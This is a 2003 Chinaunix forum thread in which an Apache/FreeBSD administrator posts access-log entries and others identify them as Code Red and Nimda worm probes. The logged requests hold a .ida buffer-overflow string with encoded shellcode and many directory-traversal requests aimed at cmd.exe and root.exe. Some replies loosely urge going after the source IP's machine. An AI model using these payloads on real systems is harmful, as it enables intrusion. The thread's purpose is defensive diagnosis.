Chinaunix

标题: 请前辈们帮忙看看，是不是有人在攻击我？ [打印本页]

作者: 雪之女 时间: 2003-04-19 14:02
标题: 请前辈们帮忙看看，是不是有人在攻击我？
我的系统是freebsd ,web server是 apache \r\n我的服务器设置好后，还没有对外宣传，可是，网络连接的指示灯在不停的闪动，察看了一下日志文件，有许多不正常的记录，大家请看看，这些举动是什么意思，有什么危害？我应该怎样处理呢？ \r\n以下是apache的log文件 access_log中的记录 \r\n218.2.11.100 - - [19/Apr/2003:12:44:50 +0800] \"GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0\" 404 330 \r\n218.7.78.151 - - [19/Apr/2003:12:24:07 +0800] \"GET /scripts/root.exe?/c+dir HTTP/1.0\" 404 335 \r\n218.7.78.151 - - [19/Apr/2003:12:24:07 +0800] \"GET /MSADC/root.exe?/c+dir HTTP/1.0\" 404 333 \r\n218.7.78.151 - - [19/Apr/2003:12:24:07 +0800] \"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 404 343 \r\n218.7.78.151 - - [19/Apr/2003:12:24:07 +0800] \"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 404 343 \r\n218.7.78.151 - - [19/Apr/2003:12:24:07 +0800] \"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 404 357 \r\n218.7.78.151 - - [19/Apr/2003:12:24:11 +0800] \"GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 404 374 \r\n218.7.78.151 - - [19/Apr/2003:12:24:11 +0800] \"GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 404 374 \r\n218.7.78.151 - - [19/Apr/2003:12:24:11 +0800] \"GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 404 390 \r\n218.7.78.151 - - [19/Apr/2003:12:24:11 +0800] \"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 404 356 \r\n218.7.78.151 - - [19/Apr/2003:12:24:12 +0800] \"GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 404 356 \r\n218.7.78.151 - - [19/Apr/2003:12:24:15 +0800] \"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 404 356 \r\n218.7.78.151 - - [19/Apr/2003:12:24:17 +0800] \"GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 404 356 \r\n218.7.78.151 - - [19/Apr/2003:12:24:18 +0800] \"GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 400 340 \r\n218.7.78.151 - - [19/Apr/2003:12:24:18 +0800] \"GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 400 340 \r\n218.7.78.151 - - [19/Apr/2003:12:24:21 +0800] \"GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 404 357 \r\n218.7.78.151 - - [19/Apr/2003:12:24:24 +0800] \"GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 404 357 \r\n以上我只是摘录了一小段，像上面的提示日志文件中不计其数，一个星期的日志文件就有了2兆多，而且几乎全是上面的记录。 \r\n我应该怎样应付呢？ \r\n另外：我还应该看哪些日志文件呢？ \r\n有没有什么专门的工具来分析这件日志文件呢?（分析攻击行为的） \r\n谢谢前辈们的帮助！

作者: qintel 时间: 2003-04-19 14:36
标题: 请前辈们帮忙看看，是不是有人在攻击我？
是中了病毒的机子试图在感染你的机子，不过是WIN下的病毒，你不用怕，把这个IP屏了算了。

作者: 弱智 时间: 2003-04-19 14:47
标题: 请前辈们帮忙看看，是不是有人在攻击我？
如果是Nimda，手工清除：\r\n\r\nhttp://www.duba.net/press/duba_reports/2001/09/19/10007.htm

作者: 潇湘夜雨 时间: 2003-04-19 15:16
标题: 请前辈们帮忙看看，是不是有人在攻击我？
雪之女 \r\n\r\n\r\n\r\n\r\n级别: 圣骑士\r\n注册时间: 2003-03-01\r\n帖子: 145\r\n\r\n 发表于: 2003-04-19 14:02 发表主题: 请前辈们帮忙看看，是不是有人在攻击我？ \r\n\r\n--------------------------------------------------------------------------------\r\n \r\n我的系统是freebsd ,web server是 apache \r\n我的服务器设置好后，还没有对外宣传，可是，网络连接的指示灯在不停的闪动，察看了一下日志文件，有许多不正常的记录，大家请看看，这些举动是什么意思，有什么危害？我应该怎样处理呢？ \r\n以下是apache的log文件 access_log中的记录 \r\n \r\n 如你上边所说.系统刚刚安装后就有这样的情况出现.夜雨怀疑你安装光盘上是否有DU.\r\n GET /scripts/root.exe?/c+dir HTTP/1.0\" 404 335 \r\n GET /MSADC/root.exe?/c+dir HTTP/1.0\" 404 333 \r\n GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 404 343 \r\n GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 404 343 \r\n 从这四个语句上判断应该是蠕虫它首先搜寻关于ROOT得相关文件(scripts/root.exe?/)然后返回信息.应该明白了吧!!\r\n 不要吧屏蔽掉.关掉蠕虫打开的后门.另外建议你,反追踪这个IP地址!~!!

作者: windtalkers 时间: 2003-04-21 17:30
标题: 请前辈们帮忙看看，是不是有人在攻击我？
从这句GET /scripts/root.exe?/c+dir看应该是CodeRed吧，找到那个IP干掉那台机器上的病毒\r\n\r\n楼上的老大，头像能小点吗？看起来太麻烦了

欢迎光临 Chinaunix (http://bbs.chinaunix.net/)